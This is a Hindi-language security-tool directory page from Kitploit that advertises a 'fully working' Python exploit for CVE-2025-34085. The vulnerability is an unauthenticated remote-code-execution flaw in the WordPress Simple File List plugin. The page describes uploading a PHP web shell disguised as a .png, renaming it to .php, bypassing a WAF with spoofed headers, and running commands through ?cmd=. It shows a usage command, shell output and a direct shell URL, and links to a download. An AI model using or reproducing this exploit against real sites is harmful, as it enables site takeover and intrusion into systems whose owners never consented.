Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2025-34085 — Simple File List – बिना प्रमाणीकरण वाला RCE एक्सप्लॉइट (CVE-2025-34085) | Kitploit
उपकरण/GitHubGitHub/mrjhaxcore/cve-2025-34085
पेलोड जनरेशनभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगरेड टीमिंग
GitHubmrjhaxcore/cve-2025-34085

CVE-2025-34085

Simple File List – बिना प्रमाणीकरण वाला RCE एक्सप्लॉइट (CVE-2025-34085)

रिपॉजिटरी देखें
121 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

📂 Simple File List – अप्रमाणित RCE शोषण (CVE-2025-34085)

⚠️ शोषण कोड द्वारा: Mrj Haxcore

WordPress Simple File List प्लगइन (<= 4.2.3) के लिए एक पूरी तरह काम करने वाला Python शोषण, जो असुरक्षित फ़ाइल अपलोड और नाम बदलने के तर्क के कारण अप्रमाणित दूरस्थ कोड निष्पादन (RCE) के लिए कमजोर है।


💣 कमजोरियों का सारांश

  • प्लगइन: Simple File List (simple-file-list)
  • संस्करण: <= 4.2.3
  • CVE: CVE-2025-34085
  • प्रभाव: अप्रमाणित उपयोगकर्ता .png के रूप में छिपी एक PHP फ़ाइल अपलोड कर सकते हैं, फिर इसे .php में बदल सकते हैं और मनमाना कोड निष्पादित कर सकते हैं।
  • आवश्यकताएँ: कोई प्रमाणीकरण आवश्यक नहीं
  • शोषण प्रकार: फ़ाइल अपलोड → नाम बदलने से बचाव → कमांड निष्पादन

✅ विशेषताएँ

  • 🚀 पूरी तरह से स्वचालित शोषण श्रृंखला
  • 📤 मैन्युअल multipart/form-data निर्माता (415 को बायपास करता है)
  • 🔁 .php, .php5, .phtml आदि के लिए नाम बदलने का ब्रूट-फोर्स
  • 🛡️ WAF को बायपास करने के लिए यथार्थवादी स्पूफ़्ड हेडर
  • 🐚 ?cmd= के माध्यम से कमांड निष्पादन
  • 🧼 साफ आउटपुट (कोई �PNG कचरा नहीं)

  • 🛠 उपयोग

    root@kitploit:~
    python3 simple.py https://target.site
    
    [+] Uploading shell as 8dkls0qp.png...
    [+] Upload successful.
    [+] Trying to rename to: 8dkls0qp.php...
    [+] Rename successful: 8dkls0qp.php
    [+] Triggering shell: https://target.site/wp-content/uploads/simple-file-list/8dkls0qp.php?cmd=id
    [+] Shell output:
    uid=33(www-data) gid=33(www-data) groups=33(www-data)
    
    Manual Visit
    
    https://target.site/wp-content/uploads/simple-file-list/8dkls0qp.php?cmd=whoami
    
    टूल डाउनलोड करें